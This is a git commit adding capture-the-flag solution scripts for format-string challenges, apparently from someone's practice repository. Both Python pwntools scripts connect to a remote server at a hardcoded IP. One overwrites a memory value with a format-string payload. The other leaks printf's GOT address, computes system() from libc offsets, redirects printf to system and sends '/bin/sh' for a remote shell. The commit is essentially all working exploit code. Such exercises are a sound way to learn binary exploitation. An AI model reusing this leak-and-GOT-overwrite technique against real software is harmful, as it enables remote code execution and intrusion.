Added 5 problems and solutions

2022-05-11 18:07:40 +08:00
parent 272640d3c6
commit 39718ef2c1
16 changed files with 307 additions and 0 deletions
--- a/FormatString/attachment-31/answer.py
+++ b/FormatString/attachment-31/answer.py
@@ -0,0 +1,27 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+
+p = remote("123.57.69.203", 5310)
+# p = process('./attachment-31')
+elf = ELF('./attachment-31')
+
+# gdb_command = ""
+# gdb.attach(p, gdb_command)
+# time.sleep(2)
+
+
+x_addr = int(p.recv(10), 16)
+log.info(hex(x_addr))
+
+for _ in range(3):
+    p.sendline("1")
+p.recvuntil("What's your name?\n")
+payload = fmtstr_payload(10, {x_addr: 9})
+p.sendline(payload)
+
+p.interactive()
--- a/FormatString/attachment-31/attachment-31
+++ b/FormatString/attachment-31/attachment-31
--- a/FormatString/attachment-31/attachment-31.idb
+++ b/FormatString/attachment-31/attachment-31.idb
--- a/FormatString/sp1/answer.py
+++ b/FormatString/sp1/answer.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env python2
+
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+
+p = remote("123.57.69.203", 7010)
+# p = process('./sp1')
+elf = ELF('./sp1')
+# gdb_command = ""
+# gdb.attach(p, gdb_command)
+# time.sleep(1)
+
+printf_got = elf.got['printf']
+
+p.recvuntil('Can you find the magic word?\n')
+p.sendline('%7$s' + p32(printf_got))
+printf_libc = u32(p.recv(4))
+system_libc = printf_libc - 0x000512D0 + 0x0003D200
+
+payload = fmtstr_payload(6, {printf_got: system_libc})
+p.sendline(payload)
+p.sendline("/bin/sh")
+
+p.interactive()
--- a/FormatString/sp1/sp1
+++ b/FormatString/sp1/sp1
--- a/FormatString/sp1/sp1.idb
+++ b/FormatString/sp1/sp1.idb